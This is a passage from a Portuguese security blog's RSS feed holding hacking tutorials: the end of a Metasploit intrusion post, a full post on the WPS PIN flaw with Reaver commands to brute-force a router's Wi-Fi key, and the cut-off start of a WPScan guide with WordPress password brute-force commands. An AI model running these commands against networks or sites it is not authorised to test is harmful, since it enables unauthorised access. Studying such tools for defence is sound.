Veja que não foi realizada a etapa de fingerprint com o alvo, pois &quot;falamos&quot; para o exploit o S.O. que ele encontrará em seu destino.&lt;br /&gt;
&lt;br /&gt;
Ok! Finish! The end! Heheheh&lt;br /&gt;
Ah!&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/FX1Ek.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;206&quot; src=&quot;http://i.imgur.com/FX1Ek.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Fonte: Vivaolinux.</description><link>http://max-sec.blogspot.com/2012/05/intrusao-simples-com-metasploit.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-6655859394150268510</guid><pubDate>Mon, 16 Jan 2012 19:04:00 +0000</pubDate><atom:updated>2013-07-24T09:14:24.753-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>A vulnerabilidade no WPS que torna o WPA/WPA2 vulnerável a ataques !</title><description>&lt;div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Introdução&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Tradicionalmente, ganhar acesso não autorizado a uma rede com o WPA, especialmente no caso do WPA2 é difícil e demorado, já que é necessário descobrir a chave usando um ataque de força bruta. Chaves curtas podem ser descobertas em alguns dias usando um processador rápido, ou uma boa GPU, mas chaves longas e complexas, especialmente as com 12 dígitos ou mais são quase impossíveis de serem descobertas. Tudo mudou com o descobrimento de uma falha grosseira de segurança no protocolo WPS, que é suportado pela maioria dos roteadores atuais.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
O WPS oferece uma forma simples de configuração para redes Wireless. O roteador inclui um PIN de 8 dígitos, geralmente informado em uma etiqueta na parte inferior, permitindo a conexão de qualquer cliente onde este PIN seja informado. Outros vão além oferecendo também um botão de conexão, que deve ser pressionado no roteador para autorizar a conexão de um novo cliente. A ideia do WPS é que este é um padrão de segurança aceitável para uma rede doméstica, já que se alguém tem acesso físico ao roteador, para ver o PIN ou pressionar o botão, ele provavelmente está autorizado a acessar a rede de qualquer forma.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.hardware.com.br/static/20120105/wps03.jpg.499x364.auto.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;233&quot; src=&quot;http://www.hardware.com.br/static/20120105/wps03.jpg.499x364.auto.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
Desde o início, WPS parecia ser uma brecha esperando para ser explorada, mas a facilidade de configuração foi suficiente para reduzir bastante as chamadas de suporte e devoluções de produtos, o que foi suficiente para convencer quase todos os principais fabricantes a incluírem a tecnologia em seus roteadores domésticos. Eventualmente, a bomba explodiu, dando origem à maior brecha de segurança em redes Wi-Fi desde o WEP.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
O WPS foi sempre vulnerável a ataques de força bruta, já que um PIN de apenas 8 caracteres, contendo apenas números não oferece uma complexidade muito grande. Em teoria, o protocolo deveria oferecer um sistema se segurança para bloquear clientes depois de algumas tentativas incorretas, mas na prática poucos fabricantes implementaram bloqueios efetivos, deixando a grande maioria dos roteadores do mercado vulneráveis. O único obstáculo é o fato de que para cada tentativa o cliente precisa esperar a resposta do roteador, o que limita o número de tentativas por minuto a cerca de 20 a 40, fazendo com que a quebra de uma chave de 8 dígitos demorasse anos.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Isso mudou com uma brecha tornada pública em 27/12/2011. A forma como o roteador responde às tentativas mal-sucedidas de conexão, enviando um pacote EAP-NACK permite que o atacante descubra se os 4 primeiros dígitos do PIN estão corretos. Para piorar, o último dígito do PIN é um checksum, que pode ser facilmente calculado uma vez que os 7 primeiros dígitos são conhecidos. Com isso, o atacante precisa de um número de tentativas suficiente para descobrir os 4 primeiros dígitos, gerar uma tabela com as possibilidades possíveis para os 3 últimos dígitos e mais o checksum (uma vez que o checksum é a soma dos 7 primeiros dígitos) e realizar uma última rodada de tentativas até encontrar o PIN correto. Com isso, o número de possibilidades cai de 1 bilhão para apenas 11.000 tentativas, que podem ser esgotadas em poucas horas.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Diferente do SSID e da chave WPA, o PIN normalmente não pode ser alterado pelo usuário. Uma vez o atacante obtém acesso à rede, ele continuará conseguindo se conectar, por mais que o dono tente alterar a chave de acesso ou mesmo o SSID da rede. Na maioria dos aparelhos, o PIN pode ser descoberto em apenas 4 a 10 horas, colocando um potencial atacante a apenas uma madrugada de distância da sua rede.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Diferente do WEP, o WPA não permite que uma vez dentro da rede você possa escutar as conexões dos outros clientes, já que cada um utiliza um canal encriptado particular. Entretanto, isso não impede que o atacante possa invadir servidores, roteadores ou as próprias estações para obter assim acesso a dados e outras informações.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
A primeira ferramenta para explorar a brecha é o Reaver, &lt;a href=&quot;http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html&quot; target=&quot;_blank&quot;&gt;publicado&lt;/a&gt; pela Tactical Network Solutions. Ele possui uma versão open-source gratuita e também uma versão premium, com direito a suporte e uma interface web de controle. Não apenas ele é capaz de descobrir o PIN de acesso, como também a chave WPA/WPA2 (independentemente da complexidade) e o SSID da rede a partir do endereço MAC do roteador. &amp;nbsp;No caso de roteadores que permitem definir várias chaves WPA, o ataque permite descobrir todas as chaves de uma só vez.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
A versão open-source está disponível no &lt;a href=&quot;http://code.google.com/p/reaver-wps/&quot;&gt;http://code.google.com/p/reaver-wps/&lt;/a&gt;. Para instalar a partir do código, você precisa apenas dos compiladores básicos e dos pacotes libpcap-dev (libpcap0.8-dev no Squeeze) e libsqlite3-dev. A instalação é feita usando o tradicional ./configure, make e make install.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Para usá-lo, é necessário colocar a interface em modo monitor, usando o ifconfig e iwconfig, como em:&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;b&gt;$ su &amp;lt;senha&amp;gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# ifconfig wlan1 down&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# iwconfig wlan1 mode monitor&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# ifconfig wlan1 up&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
Apesar de ser uma ferramenta de linha de comando, o reaver é bastante simples de usar, precisando apenas do device da placa wireless e do endereço MAC do roteador alvo (que pode ser facilmente descoberto usando o kismet, airodump-ng ou outra ferramenta de diagnóstico), como em:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# reaver -i wlan1 -b 54:E6:FC:E4:92:82&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Caso necessário, você pode especificar também o canal e o SSID da rede no comando, como em:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;# reaver -i wlan1 -b 54:E6:FC:E4:92:82 -c 4 -e gdh&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
A partir daí o resto do ataque é feito automaticamente, com o Reaver tentando todas as possibilidades possíveis para o PIN, aguardando caso o roteador deixar de responder e assim por diante, até encontrar a chave. Em alguns casos, o roteador pode travar durante o teste, ou deixar de responder temporariamente aos clientes da rede local, o que também abre as portas para ataques de negação de serviço.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Já foi até publicado um vídeo oficial que mostra o processo completo, desde a compilação:&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;iframe allowfullscreen=&quot;&quot; frameborder=&quot;0&quot; height=&quot;225&quot; mozallowfullscreen=&quot;&quot; src=&quot;http://player.vimeo.com/video/34378644?title=0&amp;amp;byline=0&amp;amp;portrait=0&quot; webkitallowfullscreen=&quot;&quot; width=&quot;400&quot;&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
A lista dos fabricantes vulneráveis inclui a D-Link, Linksys, Netgear, TP-Link e ZyXEL, bem como a Belkin, Buffalo e Technicolor. Naturalmente, a brecha não atinge todos os produtos, mas a percentavel vulnerável representa dezenas de milhões de aparelhos.&lt;br /&gt;
&lt;br /&gt;
Caso exista uma opção para desativar o WPS na configuração do roteador, ela pode ser uma forma simples de resolver o problema. A principal questão é que em muitos produtos a opção está disponível, mas ela não desativa realmente o WPS, fazendo com que a vulnerabilidade persista. Nesses casos, a solução seria atualizar o firmware ou, (caso não exista um patch disponível) substituir o aparelho por um não vulnerável. Outra solução é &lt;a href=&quot;http://www.hardware.com.br/tutoriais/ddwrt/&quot; target=&quot;_blank&quot;&gt;substituir o firmware padrão pelo DD-WRT&lt;/a&gt;, já que além de oferecer mais opções e recursos, ele não oferece suporte ao WPS, resolvendo o problema pela raiz.&lt;br /&gt;
&lt;br /&gt;
Naturalmente, é possível também bloquear o acesso de clientes não autorizados usando o bloqueio com base no endereços MAC, mas esta é uma proteção que pode ser facilmente burlada, já que basta monitorar a rede por algum tempo, coletar uma lista dos endereços dos clientes que estão transmitindo dados e modificar o enderçeo da placa local para utilizar o mesmo MAC que um deles.&lt;br /&gt;
&lt;br /&gt;
Esta é uma brecha que vai continuar a repercutir por muitos meses ou anos, já que roteadores wireless não são dispositivos que os usuários substituem com muita frequência e, mesmo que a maioria dos fabricantes venha a eventualmente atualizarem todos os modelos vulneráveis, a grande maioria dos usuários nunca chegará a atualizar seus roteadores, continuando a utilizar aparelhos vulneráveis por anos. Como resultado, viajantes e espertinhos em busca de acesso grátis vão voltar a ter facilidade para encontrar redes vulneráveis, assim como na época do WEP.&lt;br /&gt;
&lt;br /&gt;
Fonte:&amp;nbsp;&lt;a href=&quot;http://www.hardware.com.br/artigos/reaven/&quot;&gt;http://www.hardware.com.br/artigos/reaven/&lt;/a&gt;</description><link>http://max-sec.blogspot.com/2012/01/vulnerabilidade-no-wps-que-torna-o.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-3157186500785778169</guid><pubDate>Sun, 08 Jan 2012 22:36:00 +0000</pubDate><atom:updated>2013-07-24T09:14:48.514-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>Descobrindo vulnerabilidades em WordPress - WPScan</title><description>&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #e3e3e3; font-family: helvetica, arial, sans-serif; font-size: 14px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; line-height: 20px; margin-bottom: 20px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;&quot;&gt;WPScan é um &amp;nbsp;Scanner de segurança para WordPress escrito em Ruby que tenta encontrar falhas de segurança conhecidas no interior das instalações WordPress.&amp;nbsp;Usados pelos&lt;/span&gt;&amp;nbsp;profissionais de segurança ou administradores WordPress para avaliar a postura de segurança de suas instalações de WordPress.&amp;nbsp;A base de código é Open Source e licenciado sob a&amp;nbsp;&lt;a href=&quot;http://www.gnu.org/licenses/gpl.html&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #2279a2; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none !important; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;GPLv3&lt;/a&gt;&amp;nbsp;.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; line-height: 20px; margin-bottom: 20px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;As características incluem:&lt;/strong&gt;&lt;/div&gt;
&lt;ul style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; list-style-image: initial; list-style-position: initial; list-style-type: circle; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;&quot;&gt;Enumeração nome de usuário&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;&quot;&gt;Quebra de senha fraca (multithreaded)&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;&quot;&gt;Enumeração versão&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;&quot;&gt;Enumeração de vulnerabilidade (baseado na versão)&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;Enumeração dos plugin&amp;nbsp;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;Enumeração vulnerabilidade dos plugins (baseado na versão)&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;Outros cheques diversos&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;Instalação:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: helvetica, arial, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 14px; line-height: 20px;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: helvetica, arial, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 14px; line-height: 20px;&quot;&gt;&lt;b&gt;Instalando no Backtrack 5&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: helvetica, arial, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 14px; line-height: 20px;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: helvetica, arial, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 14px; line-height: 20px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: helvetica, arial, sans-serif;&quot;&gt;sudo apt-get install libcurl4-gnutls-dev&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: helvetica, arial, sans-serif;&quot;&gt;sudo gem install --user-install mime-types typhoeus xml-simple&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: 13px; line-height: 1.25em; max-width: 64em;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 1.25em; max-width: 64em;&quot;&gt;
&lt;b&gt;Instalando no Debian/Ubuntu&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;line-height: 1.25em; max-width: 64em;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: arial, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;max-width: 64em;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;sudo gem install typhoeus xml-simple&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: arial, sans-serif; font-size: 13px;&quot;&gt;
&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #e3e3e3; font-family: helvetica, arial, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-size: 14px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;Comandos:&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;br /&gt;
--url ( A url do wordpress para escanear)&lt;br /&gt;
--enumerate ( Tipo de enumeração a fazer, podendo ser , u = usuario, v = versão , t = timthumb , p = plugin)&lt;br /&gt;
--wordlist ( Fornecer um arquivo contendo as possiveis senhas para o wpscan tentar o brute force)&lt;br /&gt;
--username (brute force apenas com um usuario especifico&lt;br /&gt;
--generate_plugin_list ( gera uma lista dos plugins )&lt;br /&gt;
&lt;div style=&quot;font-weight: bold;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: arial, sans-serif;&quot;&gt;&lt;b&gt;Exemplos:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;display: inline !important;&quot;&gt;
&lt;b&gt;Checagem &quot;Não intrusiva&quot;&lt;/b&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;./wpscan.rb --url www.exemplo.com&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;b&gt;Fazer um ataque de força bruta ultilizando o arquivo darkc0de.lst&lt;/b&gt;&lt;br /&gt;
./wpscan.rb --url www.exemplo.com --wordlist darkc0de.lst --threads 50&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;b&gt;Fazer um ataque de força bruta apenas usando o login &quot;admin&quot;&lt;/b&gt;&lt;br /&gt;
./wpscan.rb --url www.exemplo.com --wordlist darkc0de.lst --username admin&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;b&gt;Gerar uma nova lista de plugin &#39;mais popular&#39;, até 150 páginas .&lt;/b&gt;..&lt;br /&gt;
./wpscan.rb --generate_plugin_list 150&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;b&gt;Enumerar plugins instalados&lt;/b&gt;&lt;br /&gt;
./wpscan.rb --url www.exemplo.com --enumerate p&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHciJTZ-B7eXEVXSOgGnT5yirVbBG08uKZiZYKJLtrKZu0F0BeoECrk2l2aZAIA8_2aOv5zWCtwbxESZpcBk4-Ei4aPk7VtW8bDjUpF4eOZWyjBR1cxmbQ0WG_uFvF5QGVRKtTXRGWpcwk/s1600/wordpress.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;219&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHciJTZ-B7eXEVXSOgGnT5yirVbBG08uKZiZYKJLtrKZu0F0BeoECrk2l2aZAIA8_2aOv5zWCtwbxESZpcBk4-Ei4aPk7VtW8bDjUpF4eOZWyjBR1cxmbQ0WG_uFvF5QGVRKtTXRGWpcwk/s320/wordpress.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;enumerando os plugins ( --enumerate p )&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, sans-serif;&quot;&gt;
&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: arial, sans-serif; font-size: 13px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: arial, sans-serif; font-size: 13px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: arial, sans-serif; font-size: 13px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: arial, sans-serif;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;Download do wpscan -&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #e3e3e3; font-family: helvetica, arial, sans-serif; line-height: 20px;&quot;&gt;&lt;a href=&quot;http://code.google.com/p/wpscan/&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #2279a2; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none !important; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span class=&quot;goog-text-highlight&quot; 